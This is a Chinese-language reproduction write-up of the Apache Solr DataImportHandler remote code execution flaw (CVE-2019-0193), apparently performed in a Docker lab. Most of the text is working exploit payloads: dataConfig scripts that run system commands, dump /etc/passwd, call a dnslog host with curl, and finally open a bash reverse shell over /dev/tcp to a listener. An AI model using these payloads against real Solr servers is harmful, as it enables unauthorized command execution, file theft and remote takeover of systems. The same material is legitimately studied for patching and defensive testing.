Apache Solr RCE(CVE-2019-0193)
其原理主要基于Solr的DataImportHandler(数据导入处理器)模块,这个模块允许用户通过配置文件(dataConfig)来定义数据的导入过程,在dataConfig中,用户可以定义JavaScript函数来转换或处理数据。如果这些脚本没有得到适当的限制,攻击者可以利用这一点执行任意代码。
Apache Solr版本小于8.2.0
docker搭建需要额外一步
docker compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db -force
漏洞复现
原始poc
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/ccc9wy");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
实现不了,更新了,但文件没创建
RCE
先在本机搭一个poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<RDF>
<item/>
</RDF>
调整一下poc
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream()));
var result = [];
while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}
row.put("title",result.join("\n\r"));
return row;
}
]]></script>
<document>
<entity name="whatever"
url="http://192.168.1.250/poc.xml"
processor="XPathEntityProcessor"
forEach="/RDF/item"
transformer="script:poc" />
</document>
</dataConfig>
抓个包查看一下,执行poc时抓包
放到重发器中可以看到命令执行结果
使用dnslog测试
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("curl n6xis3.dnslog.cn").getInputStream()));
var result = [];
while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}
row.put("title",result.join("\n\r"));
return row;
}
]]></script>
<document>
<entity name="whatever"
url="http://192.168.1.250/poc.xml"
processor="XPathEntityProcessor"
forEach="/RDF/item"
transformer="script:poc" />
</document>
</dataConfig>
执行后成功收到结果
反弹shell
/bin/bash -c bash$IFS$9-i>&/dev/tcp/192.168.200.131/6666<&1
完整poc
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("/bin/bash -c bash$IFS$9-i>&/dev/tcp/192.168.200.131/6666<&1").getInputStream()));
var result = [];
while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}
row.put("title",result.join("\n\r"));
return row;
}
]]></script>
<document>
<entity name="whatever"
url="http://192.168.1.250/poc.xml"
processor="XPathEntityProcessor"
forEach="/RDF/item"
transformer="script:poc" />
</document>
</dataConfig>
成功获取反弹shell
